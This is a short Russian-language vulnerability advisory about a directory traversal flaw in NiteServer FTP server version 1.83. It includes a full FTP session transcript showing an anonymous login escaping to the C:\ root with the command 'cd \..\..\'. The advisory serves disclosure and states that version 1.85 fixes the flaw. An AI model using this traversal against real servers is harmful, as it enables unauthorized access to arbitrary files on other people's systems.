NiteServer – простой FTР сервер с некоторыми специфическими особенностями. В программе обнаружена возможность обхода каталога несколькими способами. 

NiteServer не в состоянии фильтровать последовательность «\..» в FTP командах, в результате удаленный атакующий может выйти за пределы разрешенных директорий и получить доступ к произвольным файлам на уязвимой системе. Пример: 

Connected to 192.168.1.22.
220- Niteserver Version:1.83
220- Author:Thomas Krebs
220- email: turtie@knuut.de
220- Welcome to the Niteserver
220- First Author:Thomas Krebs!
220-
220
User (192.168.1.22:(none)): anonymous
331 User anonymous accepted, send password…..
Password:
230 User anonymous accepted, ok come on…..
ftp> ls
200 PORT command ok….
257 «c:/ftpd/data» is working directory…c:\ftpd\data
ftp> cd /
250 Directory changed to»c:\ftpd\data» .
ftp> cd ..
250 Directory changed to»c:\ftpd\data» .
ftp> cd \..\..\
250 Directory changed to»c:\» .
ftp> ls
200 PORT command ok….
257 «c:/» is working directory…c:\
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
…….
226 Listing complete.
ftp: 1181 bytes received in 0,12Seconds 9,76Kbytes/sec.
ftp> bye
221 Goodbye.

Уязвимость обнаружена в NITE ftp-server version 1.83 и устранена в 1.85.

Оставить мнение